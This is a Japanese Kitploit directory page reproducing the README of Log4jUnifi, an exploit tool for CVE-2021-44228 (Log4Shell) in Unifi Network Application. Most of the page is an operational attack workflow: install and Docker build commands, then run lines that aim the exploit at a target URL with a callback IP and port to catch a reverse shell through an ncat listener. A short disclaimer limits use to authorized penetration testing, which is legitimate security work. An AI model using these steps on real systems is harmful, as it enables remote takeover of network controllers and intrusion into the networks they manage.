Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4jUnifi — Unifi Network ApplicationにおけるCVE-2021-44228を悪用してリモートコード実行などを行う。 | Kitploit
ツール/GitHubGitHub/puzzlepeaches/log4junifi
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubpuzzlepeaches/log4junifi

Log4jUnifi

Unifi Network ApplicationにおけるCVE-2021-44228を悪用してリモートコード実行などを行う。

リポジトリを見る
170312年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4jUnifi

Unifi Network ApplicationにおけるCVE-2021-44228を悪用し、リモートコード実行などを可能にします。

  • もうひとつのLog4j炎上:Unifi

なぜ?

この脆弱性の概念実証(PoC)は散在しており、手動で実施する必要があります。このリポジトリはそのエクスプロイトプロセスを自動化します。ポストエクスプロイトの手順については、上記のブログ記事を参照してください。

インストール

このリポジトリは手動またはDockerで使用できます。

手動インストール

エクスプロイトを手動でダウンロードして実行するには、以下の手順を実行してください。まず、攻撃用ホストにJavaとMavenがインストールされていることを確認します。DebianベースのOSでaptを使用してインストールするには、次のコマンドを実行します:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

GitHubリポジトリをクローンし、すべてのPython要件をインストールします:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
    && cd Log4jUnifi && pip3 install -r requirements.txt

Log4jUnifiリポジトリのルートから、以下のコマンドでRogue-Jndiプロジェクトをコンパイルします:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Dockerインストール

まず、攻撃用ホストにDockerがインストールされていることを確認します。(その手順については説明しません)

その後、以下のコマンドを実行してリポジトリをクローンし、使用するDockerイメージをビルドします。

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
    && cd Log4jUnifi && docker build -t log4junifi .

コンテナを実行するには、コマンドラインフラグを追加して、次のようなコマンドを実行します。コンテナはリバースシェルをキャッチしないので注意してください。別のシェルセッションでncatリスナーを作成する必要があります:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jUnifi/loot -p 8090:8090 -p 1389:1389 log4junifi \ 
    -u https://unifi.acme.com:8443 -i 192.168.1.1 -p 4444

使い方

root@kitploit:~
usage: exploit.py [-h] -u URL -i CALLBACK -p PORT

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Unifi Network Manager base URL
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.

使用例

ローカルシステムにインストールしたツールを使用してリバースシェルを取得します:

root@kitploit:~
python3 exploit.py -u https://unifi.acme.com:8443 -i 10.10.10.1 -p 4444

免責事項

このツールはペネトレーションテスト中に使用するために設計されています。事前の相互同意なしにターゲットを攻撃する目的でこのツールを使用することは違法です。該当するすべての現地の州法および連邦法を遵守するのはエンドユーザーの責任です。開発者は一切の責任を負わず、このプログラムの誤用についても責任を負いません。

ツールをダウンロード